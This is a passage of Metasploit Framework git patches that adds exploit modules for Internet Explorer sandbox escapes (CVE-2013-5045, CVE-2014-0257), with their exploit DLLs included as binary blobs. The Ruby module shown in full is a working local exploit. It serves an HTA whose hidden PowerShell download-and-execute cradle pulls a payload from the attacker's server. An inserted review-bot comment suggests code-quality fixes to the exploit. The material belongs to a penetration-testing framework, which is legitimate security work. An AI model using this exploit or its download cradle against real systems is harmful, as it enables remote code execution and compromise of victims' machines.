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 G1pYsu&oL(e literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb new file mode 100644 index 0000000000..cb5334af06 --- /dev/null +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb 
@@ -0,0 +1,141 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = GreatRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Post::Windows::Priv
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'MS13-097 Registry Symlink IE Sandbox Escape',
+ 'Description' => %q{
+ This module exploits a vulnerability in Internet Explorer Sandbox which allows to
+ escape the Enhanced Protected Mode and execute code with Medium Integrity. The
+ vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll
+ component, which can be abused to force medium integrity IE to user influenced keys.
+ By using registry symlinks it's possible force IE to add a policy entry in the registry
+ and finally bypass Enhanced Protected Mode.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'James Forshaw', # Vulnerability Discovery and original exploit code
+ 'juan vazquez' # metasploit module
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Targets' =>
+ [
+ [ 'IE 8 - 11', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => "Dec 10 2013",
+ 'References' =>
+ [
+ ['CVE', '2013-5045'],
+ ['MSB', 'MS13-097'],
+ ['BID', '64115'],
+ ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
+ ]
+ ))
+
+ register_options(
+ [
+ OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
+ ])
+ end
+
+ def exploit
+ print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
+
+ mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
+ if mod_handle['return'] == 0
+ fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
+ end
+
+ unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+ fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
+ end
+
+ begin
+ Timeout.timeout(datastore['DELAY']) { super }
+ rescue Timeout::Error
+ end
+ end
+
+ def primer
+ hta_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
+ session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", hta_uri)
+
+ html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
+ session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri)
+
+ temp = session.sys.config.getenv('TEMP')
+
+ print_status("Loading Exploit Library...")
+
+ session.core.load_library(
+ 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll"),
+ 'TargetFilePath' => temp + "\\CVE-2013-5045.dll",
+ 'UploadLibrary' => true,
+ 'Extension' => false,
+ 'SaveToDisk' => false
+ )
+ end
+
+ def on_request_uri(cli, request)
+ if request.uri =~ /\.hta$/
+ print_status("Sending hta...")
+ download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))"
+ command = "powershell.exe -w hidden -nop -c #{download_and_run}"
+ hta = <<-eos
+<script>
+var command = "cmd.exe /c #{command}";
+var shell = new ActiveXObject("WScript.Shell");
+shell.Run(command);
+</script>
+ eos
+ send_response(cli, hta, {'Content-Type'=>'application/hta'})
+ elsif request.uri =~ /\.psh$/
+ print_status("Sending psh payload...")
+ data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ elsif request.uri =~ /\.html$/
+ print_status("Sending window close html...")
+ close_html = <<-eos
+<html>
+<body>
+<script>
+window.open('', '_self', '');
+window.close();
+</script>
+</body>
+</html>
+ eos
+ send_response(cli, close_html, { 'Content-Type' => 'text/html' })
+ else
+ send_not_found(cli)
+ end
+ end
+
+ def get_dll
+ path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll")
+ dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+ dll
+ end
+
+end
+
From e145298c1314892d40ced509f62f96189a0cf515 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 11:45:19 -0500 Subject: [PATCH 404/853] Add module for CVE-2014-0257
---
 data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 0 -> 107520 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 124 ++++++++++++++++++ 2 files changed, 124 insertions(+) create mode 100755 data/exploits/CVE-2014-0257/CVE-2014-0257.dll create mode 100644 modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
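Review bot: `get_dll` at the end of ms13_097_ie_registry_symlink.rb is never called in this new file, since `primer` builds the same `CVE-2013-5045.dll` path itself and hands it to `session.core.load_library`, so the method is dead code that duplicates the path and should be dropped or folded into one shared path helper. In `on_request_uri` the three extension checks use `$`, which in Ruby matches at a line end rather than at the end of the string; `request.uri =~ /\.hta\z/` (and likewise for `.psh` and `.html`) is the stricter form. The empty `rescue Timeout::Error` in `exploit` swallows the timeout silently; a `vprint_status` there would let the run log show that the server stopped because DELAY elapsed rather than because of a failure. `primer` also does not guard against `getenv('TEMP')` returning nil before `temp + "\\CVE-2013-5045.dll"`, which would raise instead of failing with a clear message.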
diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll new file mode 100755 index 0000000000000000000000000000000000000000..ef0eeb3a3c9cbd1739b993a8dc9bdad0a4fa6d05 GIT binary patch literal 107520 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 